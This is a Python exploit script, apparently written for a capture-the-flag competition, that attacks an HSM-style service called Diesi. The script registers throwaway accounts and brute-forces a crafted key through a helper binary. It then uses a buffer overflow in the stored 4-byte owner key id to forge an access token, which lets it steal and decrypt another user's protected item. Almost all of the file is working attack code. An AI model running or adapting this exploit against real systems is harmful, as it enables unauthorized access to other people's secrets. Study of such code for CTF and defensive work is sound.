#!/usr/bin/env python3
import json
import os
import struct
import subprocess
import sys
from hsmutil import *
from interactions import Diesi
# Number of bytes the overflow is assumed to overwrite in the 4-byte
# little-endian owner key id.  exploit() asks crack_key for a key whose
# keystream matches the first BOF_SIZE bytes of (flag_key_id XOR
# target_key_id) at offset 4 - BOF_SIZE, and pads the token with
# 4 - BOF_SIZE bytes of 'A'.
#
# 2 is fast but may miss some flags (presumably those whose key id differs
# from ours in the bytes the overflow does not reach).
# 3 is slower but should always be sufficient.
BOF_SIZE = 3
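def crack_key(key_size: int, offset: int, target: bytes) -> bytes:
    """Run the bundled ``crack_key`` helper and return the key it finds.

    The helper is an executable named ``crack_key`` in the same directory
    as this script.  It receives ``key_size``, ``offset`` and the
    hex-encoded ``target`` as separate argv entries (no shell is involved,
    so none of them is shell-interpreted) and is expected to print a
    hex-encoded key on stdout.

    Args:
        key_size: key size passed through to the helper (units are the
            helper's; the caller passes 32).
        offset: position passed through to the helper.
        target: raw bytes the helper must match; sent hex-encoded.

    Returns:
        The key printed by the helper, decoded from hex.

    Raises:
        OSError: the helper cannot be executed (e.g. not present).
        subprocess.CalledProcessError: the helper exited non-zero.
        RuntimeError: the helper exited 0 but printed no key; previously
            this silently produced an empty key that was then imported and
            used as the exploit key.
        ValueError: the helper's output is not valid hex.
    """
    script_dir = os.path.dirname(os.path.realpath(__file__))
    helper = f'{script_dir}/crack_key'
    argv = [helper, str(key_size), str(offset), target.hex()]
    stdout = subprocess.check_output(argv)
    # bytes.fromhex tolerates the trailing newline the helper may print.
    key = bytes.fromhex(stdout.decode())
    if not key:
        raise RuntimeError(f'{helper} returned no key for target {target.hex()}')
    return key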
def exploit(host: str, flag_id: str) -> str:
    """Retrieve the flag item described by ``flag_id`` from the HSM at ``host``.

    ``flag_id`` is a JSON document whose ``key_id`` (the key owning the
    flag item) and ``item_id`` fields are converted with ``int()``.

    Steps, in the order the service must see them:
      1. Register a throw-away user and import a key from ``rand_keys``;
         the service returns its id (``target_key_id``).
      2. Compute the XOR of ``flag_key_id`` and ``target_key_id`` as 4-byte
         little-endian values and ask ``crack_key`` for a key whose
         keystream (presumably) reproduces the first ``BOF_SIZE`` bytes of
         that difference at offset ``4 - BOF_SIZE``, so that the overflow
         turns the stored owner id into ``target_key_id``.
      3. Register a second user, import that ``exploit_key``, and build a
         root token for (``target_key_id``, ``flag_item_id``), share it to
         ``exploit_key_id`` and finalize it with ``exploit_key`` plus
         ``4 - BOF_SIZE`` bytes of ``b'A'`` padding.
      4. Fetch the item with that token and decrypt it with ``exploit_key``.

    A progress line is printed to stdout before the key search.

    Returns:
        The decrypted item, decoded as UTF-8 text.

    Raises:
        KeyError / ValueError: ``flag_id`` lacks the fields or they are not
            integers.
        Whatever ``crack_key``, ``Diesi`` and the token helpers raise on
            failure; UnicodeDecodeError if the item is not UTF-8.
    """
    meta = json.loads(flag_id)
    flag_key_id = int(meta['key_id'])
    flag_item_id = int(meta['item_id'])

    # Account that owns a key we fully control.
    owner = Diesi(host)
    owner.register_checked(rand_username(), rand_password())
    (target_key,) = rand_keys(1)
    target_key_id = owner.hsm_import_key(target_key)

    print('Searching for exploit key...')
    # Difference between the id currently stored as the item's owner and the
    # id we want it to become; only the first BOF_SIZE bytes are matched.
    id_diff = bytes(
        x ^ y
        for x, y in zip(struct.pack('<I', flag_key_id),
                        struct.pack('<I', target_key_id))
    )
    exploit_key = crack_key(32, 4 - BOF_SIZE, id_diff[:BOF_SIZE])

    # Second account holding the crafted key.
    attacker = Diesi(host)
    attacker.register_checked(rand_username(), rand_password())
    exploit_key_id = attacker.hsm_import_key(exploit_key)

    padding = b'A' * (4 - BOF_SIZE)
    token = finalize_token(
        make_share_token(
            exploit_key_id,
            make_root_token(target_key_id, flag_item_id, target_key),
            target_key,
        ),
        exploit_key,
        padding,
    )
    blob = attacker.hsm_get_item(flag_item_id, token)
    return decrypt_item(blob, exploit_key).decode()
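if __name__ == '__main__':
    # Usage: 2-xor-oob.py HOST FLAG_ID_JSON
    # FLAG_ID_JSON is the document exploit() parses: {"key_id": ..., "item_id": ...}.
    # A missing argument reports usage on stderr and exits non-zero instead of
    # dying with an unpacking traceback.
    if len(sys.argv) < 3:
        sys.exit(f'usage: {sys.argv[0]} HOST FLAG_ID_JSON')
    host, flag_id = sys.argv[1:3]
    flag = exploit(host, flag_id)
    print(flag)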